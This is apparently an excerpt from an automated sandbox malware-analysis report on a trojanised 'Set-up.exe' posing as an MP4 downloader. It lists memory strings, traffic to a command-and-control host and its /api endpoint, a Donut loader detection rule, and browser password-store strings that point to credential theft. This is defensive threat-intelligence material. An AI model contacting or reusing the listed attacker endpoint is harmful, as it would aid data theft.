content="%s\ServicesJSX_duk.exeJSX_SM.dllJSX_V8.dllMediaLanguages%s\Python-32\python.exe%s\Python-64\python.exehttps:/</article><article</table><table<link<meta/div<div</style><style><script</body><body></head><head></html><html>/MPD><MPD.hlsCXMediaSearchThumbnailDownloadThreadl equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: passhudmrue.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: passhudmrue.click
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: 'Set-up.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: 'Set-up.exe, 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458966002.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457833420.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: 'Set-up.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: 'Set-up.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: 'Set-up.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: 'Set-up.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: 'Set-up.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: 'Set-up.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: 'Set-up.exeString found in binary or memory: http://s2.symcb.com0
              Source: 'Set-up.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: 'Set-up.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: 'Set-up.exeString found in binary or memory: http://sf.symcd.com0&
              Source: 'Set-up.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: 'Set-up.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: 'Set-up.exeString found in binary or memory: http://sv.symcd.com0&
              Source: 'Set-up.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 'Set-up.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 'Set-up.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 'Set-up.exeString found in binary or memory: http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar
              Source: 'Set-up.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: 'Set-up.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 'Set-up.exeString found in binary or memory: https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube
              Source: 'Set-up.exeString found in binary or memory: https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 'Set-up.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: 'Set-up.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 'Set-up.exeString found in binary or memory: https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/
              Source: 'Set-up.exe, 00000000.00000003.2387217571.0000000003754000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387037149.0000000003753000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/0
              Source: 'Set-up.exe, 00000000.00000003.2301552831.0000000003756000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2301601874.0000000003759000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/44
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/E
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/N
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/R
              Source: 'Set-up.exe, 'Set-up.exe, 00000000.00000003.2387053410.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458003560.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458936317.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419642946.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458113896.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458916538.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458003560.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430866235.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419375927.0000000000994000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289458694.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/api
              Source: 'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/api9T)
              Source: 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/api?l/h
              Source: 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/apiNp
              Source: 'Set-up.exe, 00000000.00000003.2301498819.000000000374D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/apiQ.
              Source: 'Set-up.exe, 00000000.00000003.2399629443.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2399646232.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/apihF)
              Source: 'Set-up.exe, 00000000.00000003.2419112504.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419283872.000000000374B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/apis
              Source: 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/c
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/e
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/rx
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click/t
              Source: 'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://passhudmrue.click:443/api
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: 'Set-up.exeString found in binary or memory: https://vivporn.com/wp-content/plugins/
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: 'Set-up.exeString found in binary or memory: https://www.eporner.com/EPORNEReporner.comeporner.cdn.eporner.comhttps://www.eporner.com/video-%s//&
              Source: 'Set-up.exeString found in binary or memory: https://www.eporner.com/xhr/video/%s?hash=%s&device=generic&domain=www.eporner.com&fallback=falsevar
              Source: 'Set-up.exeString found in binary or memory: https://www.google.com/Google
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: 'Set-up.exeString found in binary or memory: https://www.handjobhub.com/HandjobHubhandjobhub.comhandjobhub.cdn.handjobhub.comsrc=
              Source: 'Set-up.exeString found in binary or memory: https://www.hotmovs.com/
              Source: 'Set-up.exeString found in binary or memory: https://www.hotmovs.tube/hotmovs.comhotmovs.tubeis_defaultvideo_urlhttps://hotmovs.com/api/videofile
              Source: 'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: 'Set-up.exe, 00000000.00000003.2388398991.000000000377D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: 'Set-up.exe, 00000000.00000003.2388465216.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 'Set-up.exeString found in binary or memory: https://www.redtube.com/RedTuberedtube.comredtube.https://www.redtube.com/%sid=/player/?id=?id=
              Source: 'Set-up.exeString found in binary or memory: https://www.redtube.com/videohttps://www.thumbzilla.com/Thumbzillathumbzilla.comthumbzilla.
              Source: 'Set-up.exeString found in binary or memory: https://www.tnaflix.com/Tnaflixtnaflix.comtnaflix.
              Source: 'Set-up.exeString found in binary or memory: https://www.tomabo.com/mp4-player/download.html
              Source: 'Set-up.exeString found in binary or memory: https://www.tomabo.com/mp4-player/purchase.htmlhttps://www.tomabo.com/mp4-playerhttps://www.tomabo.c
              Source: 'Set-up.exeString found in binary or memory: https://www.tomabo.com/videos/dog-and-balls.mp4Please
              Source: 'Set-up.exeString found in binary or memory: https://www.tomabo.comVersion
              Source: 'Set-up.exeString found in binary or memory: https://www.txxx.com/
              Source: 'Set-up.exeString found in binary or memory: https://www.txxx.tube/Txxxtxxx.comtxxx.tubehttps://txxx.com/api/videofile.php?video_id=%s&lifetime=%
              Source: 'Set-up.exeString found in binary or memory: https://www.yahoo.com/Yahoo
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/%I64d-%I64d-%I64d0-%I64dContent-Type:
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/playlist?list=%shttps://i.ytimg.com/vi/%s/maxresdefault.jpghttps://i.ytimg.c
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999lengthSecondshlsManife
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/youtubei/v1/browse?key=%s&prettyPrint=falseX-Goog-Visitor-Idcontinuationclic
              Source: 'Set-up.exeString found in binary or memory: https://www.youtube.com/youtubei/v1/player?key=%s&prettyPrint=falseOriginX-Youtube-Client-VersionX-Y
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49778 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49799 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49851 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49864 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49875 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49884 version: TLS 1.2

              System Summary

              barindex
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0094E95E0_3_0094E95E
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0094E9700_3_0094E970
              Source: 'Set-up.exeStatic PE information: invalid certificate
              Source: 'Set-up.exe, 00000000.00000002.2458589159.000000000067F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exe, 00000000.00000003.2254678691.0000000002D5E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exeBinary or memory string: OriginalFilenameMP4Downloader.EXE vs 'Set-up.exe
              Source: 'Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: 'Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\'Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 'Set-up.exe, 00000000.00000003.2302381104.0000000003775000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2302495931.0000000003768000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290838605.0000000003774000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2291298453.0000000003756000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 'Set-up.exeVirustotal: Detection: 18%
              Source: 'Set-up.exeReversingLabs: Detection: 18%
              Source: C:\Users\user\Desktop\'Set-up.exeFile read: C:\Users\user\Desktop\'Set-up.exeJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\'Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 'Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: 'Set-up.exeStatic file information: File size 76577172 > 1048576
              Source: 'Set-up.exeStatic PE information: section name: RT_CURSOR
              Source: 'Set-up.exeStatic PE information: section name: RT_BITMAP
              Source: 'Set-up.exeStatic PE information: section name: RT_ICON
              Source: 'Set-up.exeStatic PE information: section name: RT_MENU
              Source: 'Set-up.exeStatic PE information: section name: RT_DIALOG
              Source: 'Set-up.exeStatic PE information: section name: RT_STRING
              Source: 'Set-up.exeStatic PE information: section name: RT_ACCELERATOR
              Source: 'Set-up.exeStatic PE information: section name: RT_GROUP_ICON
              Source: 'Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x174000
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374AF6D push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374B340 push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374CE24 pushad ; ret 0_3_0374CE3D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374CE24 pushad ; ret 0_3_0374CE3D
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374B2BC push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374B2BC push eax; ret 0_3_0374B381
              Source: C:\Users\user\Desktop\'Set-up.exeCode function: 0_3_0374AF6D push eax; ret 0_3_0374B381
